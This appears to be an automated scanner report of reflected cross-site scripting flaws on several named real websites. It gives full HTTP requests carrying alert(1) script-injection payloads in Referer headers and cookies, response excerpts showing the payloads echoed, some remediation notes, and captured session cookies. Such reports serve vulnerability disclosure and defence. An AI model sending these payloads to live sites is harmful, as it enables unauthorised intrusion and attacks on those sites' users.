Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /c/a/Windows/Ensuring-Smooth-Upgrade-Path-with-Windows-Vista/ HTTP/1.1
Host: www.eweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=f10f0"><script>alert(1)</script>01bad51f7bd
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 71fdc"-alert(1)-"4ce6adf9d90 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /c/a/Windows/How-to-Accurately-Plan-for-Windows-Server-2008-Hardware/ HTTP/1.1
Host: www.eweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=71fdc"-alert(1)-"4ce6adf9d90
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>How to Accurately Plan for Windows Server 2008 Hardware - Windows - News & Reviews - eWeek.com</title>
<meta nam
...[SNIP]...
<!--
s.pageName="How to Accurately Plan for Windows Server 2008 Hardware-Page001-50215"
s.referrer = "http://www.google.com/search?hl=en&q=71fdc"-alert(1)-"4ce6adf9d90"
s.server=""
s.channel="eWEEK Home>
...[SNIP]...
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8ca1d"><script>alert(1)</script>f5c4acd6847 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /c/a/Windows/How-to-Accurately-Plan-for-Windows-Server-2008-Hardware/ HTTP/1.1
Host: www.eweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=8ca1d"><script>alert(1)</script>f5c4acd6847
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>How to Accurately Plan for Windows Server 2008 Hardware - Windows - News & Reviews - eWeek.com</title>
<meta nam
...[SNIP]...
<input type="text" value="8ca1d"><script>alert(1)</script>f5c4acd6847" name="q" size="30">
...[SNIP]...
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5147d"-alert(1)-"4b20e967be2 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /c/s/Videos/ HTTP/1.1
Host: www.eweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=5147d"-alert(1)-"4b20e967be2
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 10669"><script>alert(1)</script>a957892fc55 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /c/s/Videos/ HTTP/1.1
Host: www.eweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=10669"><script>alert(1)</script>a957892fc55
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 13087'-alert(1)-'3c02ec02ea8 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /modules/buttons/buttons.php?urls=http%3A//www.fotoatelier-berlin.de/%7Chttp%3A//wirtschaftsthemen.net/unternehmen/karriere/eine-frauenquote-koennte-tausende-arbeitsplaetze-vernichten/006920.html%7Chttp%3A//www.w7o.de/%7Chttp%3A//www.nmworkwear.de/index.php%3FcPath%3D2_3%7Chttp%3A//www.fitness-gesundheit.biz/die-gelenkbelastung-der-unteren-extremitaten-beim-nordic-walking/%7Chttp%3A//wirtschaftsthemen.net/politik/ausland/der-westen-opfert-aegyptens-demokratie-seiner-paranoia/006911.html%7Chttp%3A//www.mittelstandsblog.de/2011/02/gfk-prognose-deutsche-2011-noch-konsumfreudiger/%7Chttp%3A//www.breitband-anbieter.com/news/iphone-5-ipad-2-und-die-lte-tarife-der-deutschen-telekom-659000/ HTTP/1.1
Host: www.kledy.de
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?hl=en&q=13087'-alert(1)-'3c02ec02ea8
Cache-Control: max-age=0
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=gd27lfmj2ui4qbk3nni47kv9tvnpfun3; WibiyaProfile=%7B%22toolbar%22%3A%7B%22stat%22%3A%22Max%22%7D%2C%22apps%22%3A%7B%22openApps%22%3A%7B%7D%7D%2C%22connectUserNetworks%22%3A%5Bnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%5D%2C%22ee%22%3A%7B%22WibiyaConnect%22%3A1%7D%7D
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 594e8'-alert(1)-'df58a5a7282 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET / HTTP/1.1
Host: www.protopage.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: 594e8'-alert(1)-'df58a5a7282
<!-- Copyright 2004-2008 Protopage Ltd. All rights reserved. --> <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <title>Pro ...[SNIP]... ":1,"tag":"YP"},{"count":1,"tag":".........."}]); var feedHistory = new Object(); var pageParams = new Object(); pageParams['currentPagePath'] = 'protopage/autocreate'; pageParams['autoAddFeedUrl'] = '594e8'-alert(1)-'df58a5a7282'; pageParams['pagePathAttempted'] = 'protopage/autocreate'; var categories = [{ "id": 1, "virtualPages": [], "sharing": {"type": "public"}, "label": "My public category", "schemeOffset": " ...[SNIP]...
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6b85f'-alert(1)-'16845b9d6f0 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /servlet/servlet.WebToLead HTTP/1.1
Host: www.salesforce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=6b85f'-alert(1)-'16845b9d6f0
Response
HTTP/1.1 200 OK
Server: SFDC
Is-Processed: true
Content-Type: text/html
Date: Sat, 05 Feb 2011 22:09:38 GMT
Connection: close
Content-Length: 498
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <html> <head> <meta HTTP-EQUIV="PRAGMA" CONTENT="NO-CACHE"> <meta http-equiv="Refresh" content="0; URL=http://www.google.com/search?hl=en ...[SNIP]... <script> if (window.location.replace){ window.location.replace('http://www.google.com/search?hl=en&q=6b85f'-alert(1)-'16845b9d6f0'); } else {; window.location.href ='http://www.google.com/search?hl=en&q=6b85f'-alert(1)-'16845b9d6f0'; } </script> ...[SNIP]...
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a87a4'-alert(1)-'332831740db was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /servlet/servlet.WebToLead HTTP/1.1
Host: www.salesforce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=a87a4'-alert(1)-'332831740db
Response
HTTP/1.1 200 OK
Server: SFDC
Is-Processed: true
Content-Type: text/html
Date: Sat, 05 Feb 2011 22:09:46 GMT
Connection: close
Content-Length: 498
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <html> <head> <meta HTTP-EQUIV="PRAGMA" CONTENT="NO-CACHE"> <meta http-equiv="Refresh" content="0; URL=http://www.google.com/search?hl=en ...[SNIP]... <script> if (window.location.replace){ window.location.replace('http://www.google.com/search?hl=en&q=a87a4'-alert(1)-'332831740db'); } else {; window.location.href ='http://www.google.com/search?hl=en&q=a87a4'-alert(1)-'332831740db'; } </script> ...[SNIP]...
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4badd"><script>alert(1)</script>e85683b5f8e was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /subscribe/newsubs/atshcstep1.asp HTTP/1.1
Host: www.slackinc.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=4badd"><script>alert(1)</script>e85683b5f8e
Response
HTTP/1.1 200 OK
Connection: close
Date: Sat, 05 Feb 2011 22:09:58 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 2616
Content-Type: text/html
Expires: Sat, 05 Feb 2011 22:08:58 GMT
Set-Cookie: ASPSESSIONIDCACARTTB=ILBALOKCLOOOFFHOCCLCGBLH; path=/
Cache-control: no-cache
<html> <head> <title>Athletic Training & Sports Health Care Subscription</title> </head> <style> a,body,td, p, blockquote, H5 { font-family: arial, helvetica, sans-serif; font-size:12px; ...[SNIP]... <input type="hidden" name="referer" value="http://www.google.com/search?hl=en&q=4badd"><script>alert(1)</script>e85683b5f8e"> ...[SNIP]...
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d6715"><script>alert(1)</script>b8dcd15839f was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /subscribe/newsubs/otistep1.asp HTTP/1.1
Host: www.slackinc.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=d6715"><script>alert(1)</script>b8dcd15839f
Response
HTTP/1.1 200 OK
Connection: close
Date: Sat, 05 Feb 2011 22:09:51 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 2598
Content-Type: text/html
Expires: Sat, 05 Feb 2011 22:08:51 GMT
Set-Cookie: ASPSESSIONIDCACARTTB=BHBALOKCGKLINLCECBKOMGBN; path=/
Cache-control: no-cache
The value of the Referer HTTP header is copied into an HTML comment. The payload 9d42c--><script>alert(1)</script>aa4b544d90d was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /index.php/sso_checker HTTP/1.1
Host: www.splunk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: Enabled=true; __utmz=204527314.1296947359.3.3.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; XARAYASID=f9dtn7oaue1nupeh7s4dpfokt0; splunk_com_uid=1; Apache=173.193.214.243.1296947376244858; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; splunk_com_xt_uid=1; PHPSESSID=afumuefdbn5a7tsaitu6o38uq5; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942985.1296947359.3; __utmc=204527314; __utmb=204527314.1.10.1296942566; __kts=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktt=ea5-22fb-55cd-38e12df7cd0af8;
Referer: 9d42c--><script>alert(1)</script>aa4b544d90d
Response (redirected)
HTTP/1.1 200 OK
Date: Sun, 06 Feb 2011 16:02:45 GMT
Server: Apache/2.2.8 (EL)
Vary: Host,Accept-Encoding,User-Agent
X-Powered-By: PHP/5.2.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 18315
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of the UID cookie is copied into the HTML document as plain text between tags. The payload 2759a<script>alert(1)</script>1bb4d3cca3c was submitted in the UID cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /bmx3/broker.pli?pid=p68511049&PRAd=264255445&AR_C=185637072 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://redacted/MRT/iview/264255445/direct;wi.300;hi.250/01/1354764918?click=http://adclick.g.doubleclick.net/aclk%3Fsa%3DL%26ai%3DBcyT_rqROTdLmI6iAlgf8zqmDD8WH7_4Bldn30BfAjbcB4JPpARABGAEg0OXxAjgAYMmGo4fUo4AQsgEIdGlwZC5jb226AQozMDB4MjUwX2FzyAEJ2gEYaHR0cDovL3RpcGQuY29tL3JlZ2lzdGVy4AEDuAIYyAKt1cMb4AIA6gIcdGlwZC1PdGhlcnMyX3NpZGViYXJfMzAweDI1MJAD6AKYA-gCqAMB0QNO9fRQWewlKugDhwfoA2voA-AC6APrBPUDAAIAxOAEAQ%26num%3D1%26sig%3DAGiWqtxTgjZHpd2on74ev1YZd4H94e6BEA%26client%3Dca-pub-7786708287155161%26adurl%3D
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p67161473=exp=1&initExp=Sat Jan 8 03:20:09 2011&recExp=Sat Jan 8 03:20:09 2011&prad=55352400&cpn=4&arc=38899481&; ar_p83612734=exp=1&initExp=Fri Jan 28 22:52:05 2011&recExp=Fri Jan 28 22:52:05 2011&prad=57555319&arc=39967551&; ar_p45555483=exp=1&initExp=Sat Jan 29 01:32:02 2011&recExp=Sat Jan 29 01:32:02 2011&prad=59007464&arc=38601779&; ar_p68511049=exp=5&initExp=Mon Jan 31 16:31:23 2011&recExp=Mon Jan 31 17:13:10 2011&prad=264243128&arc=186035359&; ar_p85001580=exp=43&initExp=Wed Jan 26 20:14:29 2011&recExp=Sat Feb 5 15:06:35 2011&prad=58087444&arc=40401508&; UID=1d29d89e-72.246.30.75-12944568102759a<script>alert(1)</script>1bb4d3cca3c
Response
HTTP/1.1 200 OK
Server: nginx
Date: Sun, 06 Feb 2011 13:40:04 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p68511049=exp=6&initExp=Mon Jan 31 16:31:23 2011&recExp=Sun Feb 6 13:40:04 2011&prad=264255445&arc=185637072&; expires=Sat 07-May-2011 13:40:04 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_G=method->-1,ts->1296999604; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 25239
if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"264255445",Pid:"p68511049",Arc:"185637072",Location: ...[SNIP]... ); }else{if(window.attachEvent){return window.attachEvent("onload",C.OnReady.onload); }}}}}},f:[],done:false,timer:null};})();}COMSCORE.BMX.Broker.Cookies={ "UID": '1d29d89e-72.246.30.75-12944568102759a<script>alert(1)</script>1bb4d3cca3c', "ar_p67161473": 'exp=1&initExp=Sat Jan 8 03:20:09 2011&recExp=Sat Jan 8 03:20:09 2011&prad=55352400&cpn=4&arc=38899481&', "ar_p85001580": 'exp=43&initExp=Wed Jan 26 20:14:29 2011&recExp=Sat Feb ...[SNIP]...
The value of the ar_p45555483 cookie is copied into the HTML document as plain text between tags. The payload a34ba<script>alert(1)</script>3f699f38ea9 was submitted in the ar_p45555483 cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /bmx3/broker.pli?pid=p68511049&PRAd=264255445&AR_C=185637072 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://redacted/MRT/iview/264255445/direct;wi.300;hi.250/01/1354764918?click=http://adclick.g.doubleclick.net/aclk%3Fsa%3DL%26ai%3DBcyT_rqROTdLmI6iAlgf8zqmDD8WH7_4Bldn30BfAjbcB4JPpARABGAEg0OXxAjgAYMmGo4fUo4AQsgEIdGlwZC5jb226AQozMDB4MjUwX2FzyAEJ2gEYaHR0cDovL3RpcGQuY29tL3JlZ2lzdGVy4AEDuAIYyAKt1cMb4AIA6gIcdGlwZC1PdGhlcnMyX3NpZGViYXJfMzAweDI1MJAD6AKYA-gCqAMB0QNO9fRQWewlKugDhwfoA2voA-AC6APrBPUDAAIAxOAEAQ%26num%3D1%26sig%3DAGiWqtxTgjZHpd2on74ev1YZd4H94e6BEA%26client%3Dca-pub-7786708287155161%26adurl%3D
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p67161473=exp=1&initExp=Sat Jan 8 03:20:09 2011&recExp=Sat Jan 8 03:20:09 2011&prad=55352400&cpn=4&arc=38899481&; ar_p83612734=exp=1&initExp=Fri Jan 28 22:52:05 2011&recExp=Fri Jan 28 22:52:05 2011&prad=57555319&arc=39967551&; ar_p45555483=exp=1&initExp=Sat Jan 29 01:32:02 2011&recExp=Sat Jan 29 01:32:02 2011&prad=59007464&arc=38601779&a34ba<script>alert(1)</script>3f699f38ea9; ar_p68511049=exp=5&initExp=Mon Jan 31 16:31:23 2011&recExp=Mon Jan 31 17:13:10 2011&prad=264243128&arc=186035359&; ar_p85001580=exp=43&initExp=Wed Jan 26 20:14:29 2011&recExp=Sat Feb 5 15:06:35 2011&prad=58087444&arc=40401508&; UID=1d29d89e-72.246.30.75-1294456810
Response
HTTP/1.1 200 OK
Server: nginx
Date: Sun, 06 Feb 2011 13:40:02 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p68511049=exp=6&initExp=Mon Jan 31 16:31:23 2011&recExp=Sun Feb 6 13:40:02 2011&prad=264255445&arc=185637072&; expires=Sat 07-May-2011 13:40:02 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_G=method->-1,ts->1296999602; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 25239
if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"264255445",Pid:"p68511049",Arc:"185637072",Location: ...[SNIP]... d Jan 26 20:14:29 2011&recExp=Sat Feb 5 15:06:35 2011&prad=58087444&arc=40401508&', "ar_p45555483": 'exp=1&initExp=Sat Jan 29 01:32:02 2011&recExp=Sat Jan 29 01:32:02 2011&prad=59007464&arc=38601779&a34ba<script>alert(1)</script>3f699f38ea9', "ar_p83612734": 'exp=1&initExp=Fri Jan 28 22:52:05 2011&recExp=Fri Jan 28 22:52:05 2011&prad=57555319&arc=39967551&', "ar_p68511049": 'exp=5&initExp=Mon Jan 31 16:31:23 2011&recExp=Mon Jan 31 17:1 ...[SNIP]...
The value of the ar_p67161473 cookie is copied into the HTML document as plain text between tags. The payload 99107<script>alert(1)</script>48b53053bd9 was submitted in the ar_p67161473 cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /bmx3/broker.pli?pid=p68511049&PRAd=264255445&AR_C=185637072 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://redacted/MRT/iview/264255445/direct;wi.300;hi.250/01/1354764918?click=http://adclick.g.doubleclick.net/aclk%3Fsa%3DL%26ai%3DBcyT_rqROTdLmI6iAlgf8zqmDD8WH7_4Bldn30BfAjbcB4JPpARABGAEg0OXxAjgAYMmGo4fUo4AQsgEIdGlwZC5jb226AQozMDB4MjUwX2FzyAEJ2gEYaHR0cDovL3RpcGQuY29tL3JlZ2lzdGVy4AEDuAIYyAKt1cMb4AIA6gIcdGlwZC1PdGhlcnMyX3NpZGViYXJfMzAweDI1MJAD6AKYA-gCqAMB0QNO9fRQWewlKugDhwfoA2voA-AC6APrBPUDAAIAxOAEAQ%26num%3D1%26sig%3DAGiWqtxTgjZHpd2on74ev1YZd4H94e6BEA%26client%3Dca-pub-7786708287155161%26adurl%3D
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p67161473=exp=1&initExp=Sat Jan 8 03:20:09 2011&recExp=Sat Jan 8 03:20:09 2011&prad=55352400&cpn=4&arc=38899481&99107<script>alert(1)</script>48b53053bd9; ar_p83612734=exp=1&initExp=Fri Jan 28 22:52:05 2011&recExp=Fri Jan 28 22:52:05 2011&prad=57555319&arc=39967551&; ar_p45555483=exp=1&initExp=Sat Jan 29 01:32:02 2011&recExp=Sat Jan 29 01:32:02 2011&prad=59007464&arc=38601779&; ar_p68511049=exp=5&initExp=Mon Jan 31 16:31:23 2011&recExp=Mon Jan 31 17:13:10 2011&prad=264243128&arc=186035359&; ar_p85001580=exp=43&initExp=Wed Jan 26 20:14:29 2011&recExp=Sat Feb 5 15:06:35 2011&prad=58087444&arc=40401508&; UID=1d29d89e-72.246.30.75-1294456810
Response
HTTP/1.1 200 OK
Server: nginx
Date: Sun, 06 Feb 2011 13:40:01 GMT
Content-Type: application/x-javascript
